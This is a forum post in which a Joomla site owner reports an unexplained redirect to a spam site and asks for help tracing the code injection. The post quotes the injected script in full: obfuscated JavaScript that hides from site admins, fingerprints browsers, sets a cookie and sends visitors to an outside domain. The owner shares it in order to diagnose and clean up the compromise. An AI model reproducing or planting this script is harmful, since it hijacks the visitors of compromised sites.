my website suddenly contains redirect to a spam website. Visible in this source code:
Code: Select all
a=['toUTCString','cookie','split','length','charAt','substring','indexOf','userAgent','match','MSIE;','OPR','Chromium','Firefox','Chrome','ppkcookie','location','https://www.areyourobots.xyz','getElementById','wpadminbar','undefined','setTime','getTime',';\x20expires='];(function(c,d){var e=function(f){while(--f){c['push'](c['shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b('0x0')](b('0x1'))===null){if(typeof c===b('0x2')){function c(d,e,f){var g='';if(f){var h=new Date();h[b('0x3')](h[b('0x4')]()+f*0x18*0x3c*0x3c*0x3e8);g=b('0x5')+h[b('0x6')]();}document[b('0x7')]=d+'='+(e||'')+g+';\x20path=/';}function i(j){var k=j+'=';var l=document[b('0x7')][b('0x8')](';');for(var m=0x0;m<l[b('0x9')];m++){var n=l[m];while(n[b('0xa')](0x0)=='\x20')n=n[b('0xb')](0x1,n['length']);if(n[b('0xc')](k)==0x0)return n[b('0xb')](k[b('0x9')],n['length']);}return null;}function o(){return navigator[b('0xd')][b('0xe')](/Android/i)||navigator['userAgent'][b('0xe')](/BlackBerry/i)||navigator[b('0xd')][b('0xe')](/iPhone|iPad|iPod/i)||navigator[b('0xd')][b('0xe')](/Opera Mini/i)||navigator[b('0xd')][b('0xe')](/IEMobile/i);}function p(){return navigator[b('0xd')]['indexOf']('Edge')!==-0x1||navigator['userAgent'][b('0xc')](b('0xf'))!==-0x1||navigator[b('0xd')][b('0xc')](b('0x10'))!==-0x1||navigator[b('0xd')][b('0xc')](b('0x11'))!==-0x1||navigator[b('0xd')]['indexOf'](b('0x12'))!==-0x1||navigator[b('0xd')]['indexOf'](b('0x13'))!==-0x1;}var q=i(b('0x14'));if(q!=='un'){if(p()||o()){c(b('0x14'),'un',0x16d);window[b('0x15')]['replace'](b('0x16'));}}}}}(this));
I can replace the joomla code, database, whatever but until i understand where this injection comes from this would be vutile.
What would be the next step for me to take to analyse this issue?
What could be causing this code injection?
Any hints? Surely i would not be the first to have an issue with this.
Joomla code was recent (3.9.18) upgraded to 3.9.22. today. This did not resolve the issue. Nothing unusual in FPA.